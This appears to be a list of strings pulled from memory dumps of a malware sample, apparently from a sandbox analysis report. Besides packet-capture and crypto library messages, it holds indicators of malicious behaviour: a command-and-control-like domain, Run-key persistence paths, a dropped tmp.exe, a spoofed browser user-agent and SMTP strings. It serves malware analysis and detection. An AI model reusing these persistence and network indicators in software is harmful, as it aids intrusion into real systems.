Sending packets isn't supported on savefiles

Setting direction is not supported on savefiles

error reading dump file: %s

truncated dump file; tried to read %u captured bytes, only got %lu

Can't write to %s: %s

%s: link-layer type %d isn't supported in savefiles

bogus IPv6 address %s

bogus ethernet address %s

illegal token: %s

illegal char '%c'

%sUnable to get the exact error message

%s%s (code %d)

%s (code %d)

Is the server properly installed on %s? connect() failed: %s

getaddrinfo(): socket type not supported

getaddrinfo(): multicast addresses are not valid when using TCP streams

Cannot retrieve the extended statistics from a file or a TurboCap port

PacketGetStatsEx error: %s

Cannot transmit a queue to an offline capture or to a TurboCap port

Impossible to set user buffer while reading from a file or on a TurboCap port

Error: invalid size %d

live dump needs a physical interface supported by the NPF driver

wrong interface type. A physical interface supported by the NPF driver is needed

e:\releases\winpcap_4_1_0_1753\winpcap\wpcap\PRJ\Release\x86\wpcap.pdb

WS2_32.dll

packet.dll

KERNEL32.dll

GetProcessHeap

GetCPInfo

GetConsoleOutputCP

wpcap.dll

> >$>(>,>

: :$:(:,:0:4:

7*848=8`8

?'?,?0?4?]?

3 3

.Xa6(

Export

system32\drivers\NPF.sys

SYSTEM\CurrentControlSet\Services\%s

\\.\%s

\\.\Global\%s

npp\ndisnpp.dll

e:\releases\winpcap_4_1_0_1753\winpcap\packetNtx\Dll\Project\Release\x86\Packet.pdb

VERSION.dll

NPPTools.dll

iphlpapi.dll

RegOpenKeyExW

RegCloseKey

RegEnumKeyW

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

1"1 141;1

435:5`5|5

0&10191\1

9.:4:8:<:>

= =@=`=|=

: this object doesn't support resynchronization

StreamTransformation: this object doesn't support random access

CryptoMaterial: this object does not support precomputation

GeneratableCryptoMaterial: this object does not support key/parameter generation

PK_MessageEncodingMethod: this signature scheme does not support message recovery

/index.html

HTTP/1.1

text/html; charset=windows-1251

The requested URL

HTTP/1.1

Clean up all keys.

Use next keys:

REG keys[

Use REG keys:

Gen new port key!

Gen new job key!

Gen new list key!

/dev/index.html

No i key:

No m key:

No p key:

No j key:

No r key:

Err in ID key: decr:

Err in ID key: check

Err in ID key: invalid

goloduha.info

Check Compromzed REG key:

Compromzed REG key:

C:\boost\include\boost-1_47\boost/exception/detail/exception_ptr.hpp

Keys3

Appkey

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

webscanx

hkcmd

firefox

em_exec

CrashReport

\tmp.exe

*.exe

explorer.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Mozilla/5.0 (Windows; U; Windows NT

; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17

SMTP:

%d.%d.%d.%d

!#$%&'* -/=?^_`{|}~

.in-addr.arpa

: Maximum attempts exeeded

%s, %d %s %d d:d:d %cdd

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps